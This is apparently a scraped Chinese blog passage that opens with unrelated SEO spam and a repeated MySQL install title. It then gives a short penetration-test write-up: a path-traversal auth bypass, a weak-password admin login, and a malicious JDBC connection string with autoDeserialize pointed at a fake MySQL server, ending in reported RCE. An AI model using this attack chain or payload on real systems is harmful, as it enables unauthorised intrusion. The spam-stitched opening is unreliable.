三原做网站,个人缴纳养老保险,企业网站seo诊断工具,东莞常平健明眼科医院MySQL从小白到入土 mysql 服务器安装windows mysql 服务漏洞复现-mysql jdbc反序列化-权限绕过 mysql 服务器安装 https://dev.mysql.com/downloads/mysql/https://www.cnblogs.com/xiaostudy/p/12262804.html
点餐小程序腾讯云服务器安装mysql8 windows mysql 服务
net sta… MySQL从小白到入土 mysql 服务器安装windows mysql 服务漏洞复现-mysql jdbc反序列化-权限绕过 mysql 服务器安装 https://dev.mysql.com/downloads/mysql/https://www.cnblogs.com/xiaostudy/p/12262804.html
点餐小程序腾讯云服务器安装mysql8 windows mysql 服务
net start mysql
漏洞复现-mysql jdbc反序列化-权限绕过
乌云 通用系统的洞 fofa 查 但是这个系统被他魔改过加了验证码前端也加密了,老洞肯定没有。 登录框大概长这样 看了一下有shiro但是打不了。 权限绕过发现/login/…;/ 能直接进去 看不到任何数据点系统参数配置这个功能发现404 去看了下同cms的站 发现直接访问index.jsp 也可以进去但是src那个站进不去不知道被咋改过 发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了 当时直接把这个登录的包拿到src的那个站去试了一下
发现他只是把jsp删了实际上功能还在 然后就直接进到了系统参数配置这里 大概长这样有一个测试连接的功能点了一下抓包包结构如下 可以控制mysql连接地址于是想到mysql服务端读客户端文件。 将mysql连接地址改为恶意mysql服务端地址发包好像不行 然后又想到mysql jdbc反序列化以前没搞过在github找到一个项目。 https://github.com/fnmsd/MySQL_Fake_Server需要一个ysoserial.jar我这边使用的 https://github.com/zema1/ysoserial可以直接打回显看了下上面那个项目的README感觉有点麻烦于是直接把 urljdbc:mysql://x.x.x.x:3306/test?autoDeserializetrue
useUnicodetrue
characterEncodingutf-8
usernameyso_urldns_http//www.baidu.com/
password123456 服务器这边开启恶意mysql服务端发包。 成功RCE